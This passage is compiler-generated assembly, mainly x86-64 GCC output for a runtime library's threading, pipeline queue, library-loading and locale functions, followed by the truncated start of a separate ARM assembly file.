PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx mov BYTE PTR [rax], 0 mov rax, QWORD PTR -80[rbp] mov QWORD PTR -112[rbp], rax mov rdx, QWORD PTR -112[rbp] mov rax, QWORD PTR -152[rbp] mov rsi, rdx mov rdi, rax call dlsym@PLT mov QWORD PTR -104[rbp], rax mov rax, QWORD PTR -112[rbp] mov rdi, rax call free@PLT mov rax, QWORD PTR -160[rbp] mov rdx, QWORD PTR -104[rbp] mov QWORD PTR [rax], rdx cmp QWORD PTR -104[rbp], 0 setne al leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE47: .size shar__get__from__lib, .-shar__get__from__lib .globl shar__unload__lib .type shar__unload__lib, @function shar__unload__lib: .LFB48: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov rax, QWORD PTR -8[rbp] mov rdi, rax call dlclose@PLT test eax, eax sete al leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE48: .size shar__unload__lib, .-shar__unload__lib .local allowThreads .comm allowThreads,1,1 .data .align 8 .type numberOfActiveThreads, @object .size numberOfActiveThreads, 8 numberOfActiveThreads: .quad 1 .text .globl shar__pipeline__use__counter__inc .type shar__pipeline__use__counter__inc, @function shar__pipeline__use__counter__inc: .LFB49: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov rax, QWORD PTR -24[rbp] mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -8[rbp] add rax, 32 mov rdi, rax call pthread_mutex_lock@PLT mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR [rax] lea rdx, 1[rax] mov rax, QWORD PTR -8[rbp] mov QWORD PTR [rax], rdx mov rax, QWORD PTR -8[rbp] add rax, 32 mov rdi, rax call pthread_mutex_unlock@PLT nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE49: .size shar__pipeline__use__counter__inc, .-shar__pipeline__use__counter__inc .globl shar__pipeline__use__counter__dec .type shar__pipeline__use__counter__dec, @function shar__pipeline__use__counter__dec: .LFB50: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov rax, QWORD PTR -24[rbp] mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -8[rbp] add rax, 32 mov rdi, rax call pthread_mutex_lock@PLT mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR [rax] lea rdx, -1[rax] mov rax, QWORD PTR -8[rbp] mov QWORD PTR [rax], rdx mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR [rax] test rax, rax sete al mov BYTE PTR -9[rbp], al mov rax, QWORD PTR -8[rbp] add rax, 32 mov rdi, rax call pthread_mutex_unlock@PLT movzx eax, BYTE PTR -9[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE50: .size shar__pipeline__use__counter__dec, .-shar__pipeline__use__counter__dec .globl shar__pipeline__is__use .type shar__pipeline__is__use, @function shar__pipeline__is__use: .LFB51: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov rax, QWORD PTR -24[rbp] mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -8[rbp] add rax, 32 mov rdi, rax call pthread_mutex_lock@PLT mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR [rax] cmp rax, 1 setne al mov BYTE PTR -9[rbp], al mov rax, QWORD PTR -8[rbp] add rax, 32 mov rdi, rax call pthread_mutex_unlock@PLT movzx eax, BYTE PTR -9[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE51: .size shar__pipeline__is__use, .-shar__pipeline__is__use .globl shar__pipeline__get__data__for__free .type shar__pipeline__get__data__for__free, @function shar__pipeline__get__data__for__free: .LFB52: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -24[rbp], rdi mov rax, QWORD PTR -24[rbp] mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -8[rbp] mov rdx, QWORD PTR 72[rax] mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR 16[rax] sal rax, 4 add rax, rdx pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE52: .size shar__pipeline__get__data__for__free, .-shar__pipeline__get__data__for__free .globl shar__pipeline__get__count__for__free .type shar__pipeline__get__count__for__free, @function shar__pipeline__get__count__for__free: .LFB53: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -24[rbp], rdi mov rax, QWORD PTR -24[rbp] mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR 24[rax] pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE53: .size shar__pipeline__get__count__for__free, .-shar__pipeline__get__count__for__free .section .rodata .LC7: .string "Unable to create mutex.\n" .text .globl shar__create__pipeline .type shar__create__pipeline, @function shar__create__pipeline: .LFB54: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 144 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov QWORD PTR -112[rbp], 80 mov rax, QWORD PTR -112[rbp] mov rdi, rax call malloc@PLT mov QWORD PTR -104[rbp], rax cmp QWORD PTR -104[rbp], 0 sete al movzx eax, al test rax, rax je .L554 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L554: mov rax, QWORD PTR -104[rbp] mov QWORD PTR -136[rbp], rax mov QWORD PTR -128[rbp], 512 mov rax, QWORD PTR -128[rbp] mov rdi, rax call malloc@PLT mov QWORD PTR -120[rbp], rax cmp QWORD PTR -120[rbp], 0 sete al movzx eax, al test rax, rax je .L556 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L556: mov rdx, QWORD PTR -120[rbp] mov rax, QWORD PTR -136[rbp] mov QWORD PTR [rax], 0 mov QWORD PTR 8[rax], 0 mov QWORD PTR 16[rax], 0 mov QWORD PTR 24[rax], 0 mov QWORD PTR 32[rax], 0 mov QWORD PTR 40[rax], 0 mov QWORD PTR 48[rax], 0 mov QWORD PTR 56[rax], 0 mov QWORD PTR 64[rax], 0 mov QWORD PTR 72[rax], 0 mov rax, QWORD PTR -136[rbp] mov QWORD PTR [rax], 1 mov rax, QWORD PTR -136[rbp] mov QWORD PTR 8[rax], 32 mov rax, QWORD PTR -136[rbp] mov QWORD PTR 72[rax], rdx mov rax, QWORD PTR -136[rbp] add rax, 32 mov esi, 0 mov rdi, rax call pthread_mutex_init@PLT test eax, eax setne al movzx eax, al test rax, rax je .L558 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 24 mov esi, 1 lea rdi, .LC7[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L558: mov rax, QWORD PTR -136[rbp] mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L560 call __stack_chk_fail@PLT .L560: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE54: .size shar__create__pipeline, .-shar__create__pipeline .globl shar__pipeline__push .type shar__pipeline__push, @function shar__pipeline__push: .LFB55: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 64 mov QWORD PTR -40[rbp], rdi mov rcx, rdx mov rax, rsi mov rdx, rdi mov rdx, rcx mov QWORD PTR -64[rbp], rax mov QWORD PTR -56[rbp], rdx mov rax, QWORD PTR -40[rbp] mov QWORD PTR -32[rbp], rax mov rax, QWORD PTR -32[rbp] add rax, 32 mov rdi, rax call pthread_mutex_lock@PLT mov rax, QWORD PTR -32[rbp] mov rdx, QWORD PTR 8[rax] mov rax, QWORD PTR -32[rbp] mov rcx, QWORD PTR 16[rax] mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR 24[rax] add rax, rcx cmp rdx, rax jne .L562 mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR 16[rax] test rax, rax jne .L563 mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR 8[rax] lea rdx, [rax+rax] mov rax, QWORD PTR -32[rbp] mov QWORD PTR 8[rax], rdx mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR 8[rax] sal rax, 4 mov rdx, rax mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR 72[rax] mov QWORD PTR -24[rbp], rax mov QWORD PTR -16[rbp], rdx mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -24[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -8[rbp], rax cmp QWORD PTR -8[rbp], 0 sete al movzx eax, al test rax, rax je .L564 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L564: mov rdx, QWORD PTR -8[rbp] mov rax, QWORD PTR -32[rbp] mov QWORD PTR 72[rax], rdx jmp .L562 .L563: mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR 24[rax] sal rax, 4 mov rdx, rax mov rax, QWORD PTR -32[rbp] mov rcx, QWORD PTR 72[rax] mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR 16[rax] sal rax, 4 add rcx, rax mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR 72[rax] mov rsi, rcx mov rdi, rax call memmove@PLT mov rax, QWORD PTR -32[rbp] mov QWORD PTR 16[rax], 0 .L562: mov rax, QWORD PTR -32[rbp] mov rdx, QWORD PTR 72[rax] mov rax, QWORD PTR -32[rbp] mov rcx, QWORD PTR 16[rax] mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR 24[rax] add rax, rcx sal rax, 4 lea rcx, [rdx+rax] mov rax, QWORD PTR -64[rbp] mov rdx, QWORD PTR -56[rbp] mov QWORD PTR [rcx], rax mov QWORD PTR 8[rcx], rdx mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR 24[rax] lea rdx, 1[rax] mov rax, QWORD PTR -32[rbp] mov QWORD PTR 24[rax], rdx mov rax, QWORD PTR -32[rbp] add rax, 32 mov rdi, rax call pthread_mutex_unlock@PLT nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE55: .size shar__pipeline__push, .-shar__pipeline__push .globl shar__pipeline__pop .type shar__pipeline__pop, @function shar__pipeline__pop: .LFB56: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov QWORD PTR -40[rbp], rdi mov rax, QWORD PTR -40[rbp] mov QWORD PTR -24[rbp], rax mov rax, QWORD PTR -24[rbp] add rax, 32 mov rdi, rax call pthread_mutex_lock@PLT mov rax, QWORD PTR -24[rbp] mov rax, QWORD PTR 24[rax] test rax, rax jne .L567 mov QWORD PTR -16[rbp], 0 mov DWORD PTR -8[rbp], 0 jmp .L568 .L567: mov rax, QWORD PTR -24[rbp] mov rdx, QWORD PTR 72[rax] mov rax, QWORD PTR -24[rbp] mov rax, QWORD PTR 16[rax] sal rax, 4 add rax, rdx mov rdx, QWORD PTR 8[rax] mov rax, QWORD PTR [rax] mov QWORD PTR -16[rbp], rax mov QWORD PTR -8[rbp], rdx mov rax, QWORD PTR -24[rbp] mov rax, QWORD PTR 16[rax] lea rdx, 1[rax] mov rax, QWORD PTR -24[rbp] mov QWORD PTR 16[rax], rdx mov rax, QWORD PTR -24[rbp] mov rax, QWORD PTR 24[rax] lea rdx, -1[rax] mov rax, QWORD PTR -24[rbp] mov QWORD PTR 24[rax], rdx .L568: mov rax, QWORD PTR -24[rbp] add rax, 32 mov rdi, rax call pthread_mutex_unlock@PLT mov rax, QWORD PTR -16[rbp] mov rdx, QWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE56: .size shar__pipeline__pop, .-shar__pipeline__pop .globl shar__destroy__pipeline .type shar__destroy__pipeline, @function shar__destroy__pipeline: .LFB57: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov rax, QWORD PTR -24[rbp] mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -8[rbp] add rax, 32 mov rdi, rax call pthread_mutex_destroy@PLT mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR 72[rax] mov rdi, rax call free@PLT mov rax, QWORD PTR -8[rbp] mov rdi, rax call free@PLT nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE57: .size shar__destroy__pipeline, .-shar__destroy__pipeline .type run_worker, @function run_worker: .LFB58: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 push rbx sub rsp, 184 .cfi_offset 3, -24 mov QWORD PTR -184[rbp], rdi mov rax, QWORD PTR fs:40 mov QWORD PTR -24[rbp], rax xor eax, eax mov DWORD PTR -168[rbp], 1 mov eax, DWORD PTR -168[rbp] cdqe lock xadd QWORD PTR numberOfActiveThreads[rip], rax mov QWORD PTR -160[rbp], rax mov rax, QWORD PTR -184[rbp] mov rcx, QWORD PTR [rax] mov rbx, QWORD PTR 8[rax] mov QWORD PTR -80[rbp], rcx mov QWORD PTR -72[rbp], rbx mov rcx, QWORD PTR 16[rax] mov rbx, QWORD PTR 24[rax] mov QWORD PTR -64[rbp], rcx mov QWORD PTR -56[rbp], rbx mov rdx, QWORD PTR 40[rax] mov rax, QWORD PTR 32[rax] mov QWORD PTR -48[rbp], rax mov QWORD PTR -40[rbp], rdx mov rax, QWORD PTR -80[rbp] mov QWORD PTR -144[rbp], rax mov rax, QWORD PTR -72[rbp] mov QWORD PTR -136[rbp], rax mov rax, QWORD PTR -64[rbp] mov rdx, QWORD PTR -56[rbp] mov QWORD PTR -128[rbp], rax mov QWORD PTR -120[rbp], rdx mov rax, QWORD PTR -48[rbp] mov rdx, QWORD PTR -40[rbp] mov QWORD PTR -112[rbp], rax mov QWORD PTR -104[rbp], rdx mov rax, QWORD PTR -128[rbp] mov rdi, rax call shar__pipeline__use__counter__inc mov rax, QWORD PTR -112[rbp] mov rdi, rax call shar__pipeline__use__counter__inc mov rax, QWORD PTR -112[rbp] mov rdx, QWORD PTR -104[rbp] mov rdi, QWORD PTR -128[rbp] mov rsi, QWORD PTR -120[rbp] mov r8, QWORD PTR -144[rbp] mov rcx, rdx mov rdx, rax call r8 mov QWORD PTR -96[rbp], rax mov QWORD PTR -88[rbp], rdx mov rax, QWORD PTR -112[rbp] mov rcx, QWORD PTR -96[rbp] mov rdx, QWORD PTR -88[rbp] mov rsi, rcx mov rdi, rax call shar__pipeline__push mov rdx, QWORD PTR -128[rbp] mov rax, QWORD PTR -120[rbp] mov rcx, QWORD PTR -136[rbp] mov rdi, rdx mov rsi, rax call rcx mov rdx, QWORD PTR -112[rbp] mov rax, QWORD PTR -104[rbp] mov rcx, QWORD PTR -136[rbp] mov rdi, rdx mov rsi, rax call rcx mov DWORD PTR -164[rbp], 1 mov eax, DWORD PTR -164[rbp] cdqe neg rax lock xadd QWORD PTR numberOfActiveThreads[rip], rax mov QWORD PTR -152[rbp], rax mov rax, QWORD PTR -184[rbp] mov rdi, rax call free@PLT mov eax, 0 mov rbx, QWORD PTR -24[rbp] sub rbx, QWORD PTR fs:40 je .L573 call __stack_chk_fail@PLT .L573: mov rbx, QWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE58: .size run_worker, .-run_worker .section .rodata .align 8 .LC8: .string "At the stage of calculating constants, it is forbidden to use threads.\n" .LC9: .string "Failed to start new thread.\n" .text .globl shar__create__worker .type shar__create__worker, @function shar__create__worker: .LFB59: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 144 mov QWORD PTR -104[rbp], rdi mov rax, rsi mov rsi, rdx mov rdx, rsi mov QWORD PTR -128[rbp], rax mov QWORD PTR -120[rbp], rdx mov rax, rcx mov rcx, r8 mov rdx, rcx mov QWORD PTR -144[rbp], rax mov QWORD PTR -136[rbp], rdx mov QWORD PTR -112[rbp], r9 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax movzx eax, BYTE PTR allowThreads[rip] xor eax, 1 movzx eax, al test rax, rax je .L575 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 71 mov esi, 1 lea rdi, .LC8[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L575: mov QWORD PTR -80[rbp], 48 mov rax, QWORD PTR -80[rbp] mov rdi, rax call malloc@PLT mov QWORD PTR -72[rbp], rax cmp QWORD PTR -72[rbp], 0 sete al movzx eax, al test rax, rax je .L576 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L576: mov rax, QWORD PTR -72[rbp] mov QWORD PTR -88[rbp], rax mov rax, QWORD PTR -88[rbp] mov rdx, QWORD PTR -104[rbp] mov QWORD PTR [rax], rdx mov rax, QWORD PTR -88[rbp] mov rdx, QWORD PTR -112[rbp] mov QWORD PTR 8[rax], rdx mov rcx, QWORD PTR -88[rbp] mov rax, QWORD PTR -128[rbp] mov rdx, QWORD PTR -120[rbp] mov QWORD PTR 16[rcx], rax mov QWORD PTR 24[rcx], rdx mov rcx, QWORD PTR -88[rbp] mov rax, QWORD PTR -144[rbp] mov rdx, QWORD PTR -136[rbp] mov QWORD PTR 32[rcx], rax mov QWORD PTR 40[rcx], rdx mov rdx, QWORD PTR -88[rbp] lea rax, -64[rbp] mov rcx, rdx lea rdx, run_worker[rip] mov esi, 0 mov rdi, rax call pthread_create@PLT test eax, eax setne al movzx eax, al test rax, rax je .L580 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 28 mov esi, 1 lea rdi, .LC9[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L580: nop mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L579 call __stack_chk_fail@PLT .L579: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE59: .size shar__create__worker, .-shar__create__worker .globl shar__yield .type shar__yield, @function shar__yield: .LFB60: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 call sched_yield@PLT nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE60: .size shar__yield, .-shar__yield .globl shar__sleep .type shar__sleep, @function shar__sleep: .LFB61: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 64 mov QWORD PTR -56[rbp], rdi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rcx, QWORD PTR -56[rbp] movabs rdx, 2361183241434822607 mov rax, rcx imul rdx mov rax, rdx sar rax, 7 sar rcx, 63 mov rdx, rcx sub rax, rdx mov QWORD PTR -32[rbp], rax mov rcx, QWORD PTR -56[rbp] movabs rdx, 2361183241434822607 mov rax, rcx imul rdx mov rax, rdx sar rax, 7 mov rdx, rcx sar rdx, 63 sub rax, rdx imul rdx, rax, 1000 mov rax, rcx sub rax, rdx imul rax, rax, 1000000 mov QWORD PTR -24[rbp], rax .L584: lea rdx, -32[rbp] lea rax, -32[rbp] mov rsi, rdx mov rdi, rax call nanosleep@PLT mov DWORD PTR -36[rbp], eax cmp DWORD PTR -36[rbp], 0 je .L586 call __errno_location@PLT mov eax, DWORD PTR [rax] cmp eax, 4 je .L584 .L586: nop mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L585 call __stack_chk_fail@PLT .L585: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE61: .size shar__sleep, .-shar__sleep .globl shar__get__threads__number .type shar__get__threads__number, @function shar__get__threads__number: .LFB62: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rax, QWORD PTR numberOfActiveThreads[rip] mov QWORD PTR -16[rbp], rax mov rax, QWORD PTR -16[rbp] mov rdx, QWORD PTR -8[rbp] sub rdx, QWORD PTR fs:40 je .L589 call __stack_chk_fail@PLT .L589: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE62: .size shar__get__threads__number, .-shar__get__threads__number .globl shar__get__pipeline__items__count .type shar__get__pipeline__items__count, @function shar__get__pipeline__items__count: .LFB63: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov rax, QWORD PTR -24[rbp] mov QWORD PTR -16[rbp], rax mov rax, QWORD PTR -16[rbp] add rax, 32 mov rdi, rax call pthread_mutex_lock@PLT mov rax, QWORD PTR -16[rbp] mov rax, QWORD PTR 24[rax] mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -16[rbp] add rax, 32 mov rdi, rax call pthread_mutex_unlock@PLT mov rax, QWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE63: .size shar__get__pipeline__items__count, .-shar__get__pipeline__items__count .type langAsUInt16, @function langAsUInt16: .LFB64: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov edx, edi mov eax, esi mov BYTE PTR -4[rbp], dl mov BYTE PTR -8[rbp], al movzx eax, BYTE PTR -8[rbp] sal eax, 8 mov edx, eax movzx eax, BYTE PTR -4[rbp] or eax, edx cdqe pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE64: .size langAsUInt16, .-langAsUInt16 .section .rodata .LC10: .string "" .LC11: .string "_ " .text .globl shar__get__language__code .type shar__get__language__code, @function shar__get__language__code: .LFB65: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax lea rsi, .LC10[rip] mov edi, 6 call setlocale@PLT mov QWORD PTR -32[rbp], rax mov rax, QWORD PTR -32[rbp] lea rsi, .LC11[rip] mov rdi, rax call strcspn@PLT mov QWORD PTR -24[rbp], rax mov esi, 110 mov edi, 101 call langAsUInt16 mov WORD PTR -34[rbp], ax cmp QWORD PTR -24[rbp], 2 jne .L595 mov rax, QWORD PTR -32[rbp] movzx eax, BYTE PTR [rax] mov BYTE PTR -11[rbp], al mov rax, QWORD PTR -32[rbp] movzx eax, BYTE PTR 1[rax] mov BYTE PTR -10[rbp], al mov BYTE PTR -9[rbp], 0 mov rax, QWORD PTR langs.0[rip] lea rdx, -11[rbp] mov rsi, rdx mov rdi, rax call strstr@PLT test rax, rax je .L595 movzx eax, BYTE PTR -10[rbp] movzx edx, al movzx eax, BYTE PTR -11[rbp] movzx eax, al mov esi, edx mov edi, eax call langAsUInt16 mov WORD PTR -34[rbp], ax .L595: movzx eax, WORD PTR -34[rbp] mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L598 call __stack_chk_fail@PLT .L598: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE65: .size shar__get__language__code, .-shar__get__language__code .globl shar__init .type shar__init, @function shar__init: .LFB66: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 64 mov DWORD PTR -52[rbp], edi mov QWORD PTR -64[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov eax, DWORD PTR -52[rbp] cdqe mov QWORD PTR __argc__[rip], rax mov rax, QWORD PTR -64[rbp] mov QWORD PTR __argv__[rip], rax mov eax, 0 call shar__get__cryptographic__random__number mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -48[rbp] xchg rax, QWORD PTR randomNumberSource[rip] mov eax, 0 call shar__get__cryptographic__random__number mov QWORD PTR -40[rbp], rax mov rax, QWORD PTR -40[rbp] xchg rax, QWORD PTR randomNumberSource[rip+8] mov eax, 0 call shar__get__cryptographic__random__number mov QWORD PTR -32[rbp], rax mov rax, QWORD PTR -32[rbp] xchg rax, QWORD PTR randomNumberSource[rip+16] mov eax, 0 call shar__get__cryptographic__random__number mov QWORD PTR -24[rbp], rax mov rax, QWORD PTR -24[rbp] xchg rax, QWORD PTR randomNumberSource[rip+24] mov eax, 0 call shar__get__cryptographic__random__number mov QWORD PTR -16[rbp], rax mov rax, QWORD PTR -16[rbp] xchg rax, QWORD PTR randomNumberSource[rip+32] call get_nprocs@PLT cdqe mov QWORD PTR cpuCoresNumber[rip], rax call tzset@PLT nop mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L600 call __stack_chk_fail@PLT .L600: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE66: .size shar__init, .-shar__init .globl shar__enable__threads .type shar__enable__threads, @function shar__enable__threads: .LFB67: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov BYTE PTR allowThreads[rip], 1 nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE67: .size shar__enable__threads, .-shar__enable__threads .globl shar__end .type shar__end, @function shar__end: .LFB68: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 lea rdi, cryptographic__random__number__mutex[rip] call pthread_mutex_destroy@PLT nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE68: .size shar__end, .-shar__end .globl shar__exit .type shar__exit, @function shar__exit: .LFB69: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov edi, 0 call exit@PLT .cfi_endproc .LFE69: .size shar__exit, .-shar__exit .globl shar__fail .type shar__fail, @function shar__fail: .LFB70: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov edi, 1 call exit@PLT .cfi_endproc .LFE70: .size shar__fail, .-shar__fail .section .rodata .align 8 .LC12: .ascii "aa ab ae af ak am ar as av ay az ba be bg bi bm bn bo br bs " .ascii "ca ce ch co cs cu cv cy da de dv dz ee el en eo es et eu fa " .ascii "ff fi fj fl fo fr fy ga gd gl gn gu gv ha he hi ho hr hu hy " .ascii "hz ia id ie ig ik is it iu ja jv ka kg ki kj kk kl km kn ko " .ascii "kr ks ku kv kw ky la lb lg ln lo lt" .string " lu lv md me mg mh mi mk ml mn mr ms mt my na nd ne ng nl nn no nr nv ny oc oj om or os pa pi pl ps pt qu rm rn ro ru rw sa sc sd sg si sk sl sm sn so sq sr ss st su sv sw ta te tg th ti tk tl tn to tr ts tt tw ty ug uk ur uz ve vi vo wo xh yi yo za zh zu " .section .data.rel.local,"aw" .align 8 .type langs.0, @object .size langs.0, 8 langs.0: .quad .LC12 .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "737529.c" .text .local __argc__ .comm __argc__,8,8 .local __argv__ .comm __argv__,4,4 .local cpuCoresNumber .comm cpuCoresNumber,8,8 .section .rodata .align 2 .LC0: .ascii "Not enough memory.\012\000" .text .align 2 .global shar__get__cmd__argument .syntax unified .arm .fpu softvfp .type shar__get__cmd__argument, %function shar__get__cmd__argument: @ args = 8, pretend = 0, frame = 104 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #104 str r0, [fp, #-116] str r1, [fp, #-112] str r2, [fp, #-124] str r3, [fp, #-120] mov r3, #0 strb r3, [fp, #-102] ldr r3, .L25 ldmia r3, {r2-r3} sub r1, fp, #116 ldmia r1, {r0-r1} cmp r1, r3 cmpeq r0, r2 bcs .L2 ldr r3, .L25+4 ldr r2, [r3] ldr r3, [fp, #-116] lsl r3, r3, #2 add 